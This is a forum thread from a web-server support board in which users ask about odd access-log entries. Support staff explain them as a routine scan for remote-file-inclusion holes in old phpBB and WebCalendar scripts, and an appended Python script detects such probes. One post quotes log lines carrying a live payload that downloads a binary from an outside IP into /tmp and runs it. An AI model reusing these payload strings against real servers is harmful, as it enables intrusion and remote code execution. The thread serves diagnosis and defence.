winterhart -
Joined: 03 Apr 2006 Posts: 2 Location: Tornado Alley, USA
Posted: Mon Apr 03, 2006 2:06 am Post subject: What is this???
I just got the free server working again...
And I keep getting every two seconds...
192.168.0.123 - - [02/Apr/2006:20:05:48 -0500] "OPTIONS / HTTP/1.1" 403 403 "" "Microsoft-WebDAV-MiniRedir/5.1.2600"

Tom Chapman -
Joined: 09 Jul 2005 Posts: 933 Location: Australia
Posted: Mon Apr 03, 2006 5:07 am Post subject:
I would not have much of a clue but to clear things up it's either a service or program by the name of Microsoft-WebDAV-MiniRedir/5.1.2600, 5.1.2600 being XP SP1? Are you using Pro or Home?

winterhart -
Joined: 03 Apr 2006 Posts: 2 Location: Tornado Alley, USA
Posted: Mon Apr 03, 2006 5:14 am Post subject: I'm using XP Home
for the moment.
Don't have the funds to get XP Pro yet... but that is in the works.
I shut down the server for now, and did some searching online with that string.
What bugs me is that's an INTERNAL to our house network IP.

jibbajabba -
Joined: 06 Sep 2005 Posts: 241 Location: England, Doncaster
Posted: Wed Apr 05, 2006 7:16 pm Post subject:
Didn't want to start a new thread, but any idea what this is trying to do?
221.3.232.142 - - [05/Apr/2006:14:35:30 +0100] "GET /webcalendar/tools/send_reminders.php?includedir=http://83.16.187.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/haita;chmod%20744%20haita;./haita;echo%20YYY;echo| HTTP/1.1" 404 403 "" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
221.3.232.142 - - [05/Apr/2006:14:35:32 +0100] "GET /webcalendar/send_reminders.php?includedir=http://83.16.187.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/haita;chmod%20744%20haita;./haita;echo%20YYY;echo| HTTP/1.1" 404 403 "" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
221.3.232.142 - - [05/Apr/2006:14:35:33 +0100] "GET /webcalendar/tools/send_reminders.phpsend_reminders.php?includedir=http://83.16.187.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/haita;chmod%20744%20haita;./haita;echo%20YYY;echo| HTTP/1.1" 404 403 "" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
221.3.232.142 - - [05/Apr/2006:14:35:35 +0100] "GET /modules/PNphpBB2/includes/functions_admin.phpfunctions_admin.php?phpbb_root_path=http://83.16.187.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/haita;chmod%20744%20haita;./haita;echo%20YYY;echo| HTTP/1.1" 404 403 "" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
221.3.232.142 - - [05/Apr/2006:14:35:36 +0100] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://83.16.187.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/haita;chmod%20744%20haita;./haita;echo%20YYY;echo| HTTP/1.1" 404 403 "" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
221.3.232.142 - - [05/Apr/2006:14:35:37 +0100] "GET /modules/includes/functions_admin.php?phpbb_root_path=http://83.16.187.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/haita;chmod%20744%20haita;./haita;echo%20YYY;echo| HTTP/1.1" 404 403 "" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
221.3.232.142 - - [05/Apr/2006:14:35:39 +0100] "GET /PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://83.16.187.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/haita;chmod%20744%20haita;./haita;echo%20YYY;echo| HTTP/1.1" 404 403 "" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
221.3.232.142 - - [05/Apr/2006:14:35:40 +0100] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://83.16.187.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/haita;chmod%20744%20haita;./haita;echo%20YYY;echo| HTTP/1.1" 404 403 "" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
221.3.232.142 - - [05/Apr/2006:14:35:42 +0100] "GET /Forums/admin/admin_styles.php?phpbb_root_path=http://83.16.187.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/haita;chmod%20744%20haita;./haita;echo%20YYY;echo| HTTP/1.1" 404 403 "" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
221.3.232.142 - - [05/Apr/2006:14:35:43 +0100] "GET /phpBB2/admin/admin_styles.php?phpbb_root_path=http://83.16.187.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/haita;chmod%20744%20haita;./haita;echo%20YYY;echo| HTTP/1.1" 404 403 "" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
221.3.232.142 - - [05/Apr/2006:14:35:44 +0100] "GET /phpBB2/admin_styles.php?phpbb_root_path=http://83.16.187.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/haita;chmod%20744%20haita;./haita;echo%20YYY;echo| HTTP/1.1" 404 403 "" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
_________________
http://www.jibba-jabba.net | http://www.mosthauntedforum.com

Goatie.dk -
Joined: 11 Feb 2005 Posts: 125 Location: Denmark > Herning
Posted: Thu Apr 06, 2006 1:25 am Post subject:
jibbajabba
That's just someone trying to find a vulnerability in some scripts.
I get those kinds of attacks once every 3 or 4 days from different IPs.
_________________
The insane dane who loves AWS :D
http://home.goatie.dk <- pic = online.. no pic, guess ;P

aprelium -
Joined: 22 Mar 2002 Posts: 6800
Posted: Thu Apr 06, 2006 11:22 am Post subject:
jibbajabba,
This is a typical little attack. The attack consists in trying to take advantage of several known vulnerabilities in old versions of popular scripts.
So if you do not have these scripts or if yours are up-to-date, there is no risk. If you look closer at the log lines, Abyss Web Server always responded with error status 404 (or 4xx) which means that it refused to serve the request because it was either referencing an inexistent file/directory or because the server judged it was very suspicious (if it is using a lot of .. and . or malformed codes).
If such attacks tend to take too much of your bandwidth, we suggest turning on the anti-hacking feature in Abyss Web Server. With it, the server will monitor visitors and will ban those who generate too many errors in a short amount of time (which is typical of attackers).
_________________
Support Team
Aprelium - http://www.aprelium.com
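
Added example, not part of the original posts and not Abyss Web Server's own code: a log triage script for the pattern discussed above. It flags requests whose query parameters carry a remote URL and clients that pile up 4xx errors in a short window. The function names, the thresholds (3 errors in 10 seconds) and the sample lines are assumptions made for illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta
from urllib.parse import urlsplit, parse_qsl

# Log layout as posted in the thread: ip - - [time] "METHOD url proto" status ...
LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "\S+ (\S+)[^"]*" (\d{3}) ')
# Constructed sample lines using documentation addresses, not a real log.
SAMPLE = '''\
203.0.113.9 - - [05/Apr/2006:14:35:30 +0100] "GET /webcalendar/send_reminders.php?includedir=http://198.51.100.7/x.dat? HTTP/1.1" 404 403 "" "Mozilla/4.0"
203.0.113.9 - - [05/Apr/2006:14:35:32 +0100] "GET /phpBB2/admin/admin_styles.php?phpbb_root_path=http://198.51.100.7/x.dat? HTTP/1.1" 404 403 "" "Mozilla/4.0"
203.0.113.9 - - [05/Apr/2006:14:35:33 +0100] "GET /Forums/admin/admin_styles.php?phpbb_root_path=http://198.51.100.7/x.dat? HTTP/1.1" 404 403 "" "Mozilla/4.0"
192.0.2.44 - - [05/Apr/2006:14:36:00 +0100] "GET /index.html HTTP/1.1" 200 5120 "" "Mozilla/4.0"
192.0.2.44 - - [05/Apr/2006:14:40:00 +0100] "GET /missing.gif HTTP/1.1" 404 403 "" "Mozilla/4.0"
'''.splitlines()

def remote_url_params(url):
    """Names of query parameters whose value is itself a remote URL."""
    pairs = parse_qsl(urlsplit(url).query, keep_blank_values=True)
    return [k for k, v in pairs if v.lower().startswith(("http://", "https://", "ftp://"))]

def scan(lines, max_errors=3, window=timedelta(seconds=10)):
    """Return (probes, flagged). Thresholds are assumed, not Abyss defaults."""
    recent, probes, flagged = defaultdict(deque), defaultdict(list), set()
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # skip lines that do not match the layout
        ip, ts, url, status = m.groups()
        when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
        probes[ip].extend(remote_url_params(url))
        if status.startswith("4"):
            q = recent[ip]
            q.append(when)
            while when - q[0] > window:  # drop errors older than the window
                q.popleft()
            if len(q) >= max_errors:  # too many 4xx in a short time
                flagged.add(ip)
    return {ip: names for ip, names in probes.items() if names}, flagged

if __name__ == "__main__":
    print(scan(SAMPLE))
```

A client that appears in both results (remote-URL parameters plus a burst of 4xx responses) matches the scanning behaviour described in the post; a single stray 404 from a normal visitor does not.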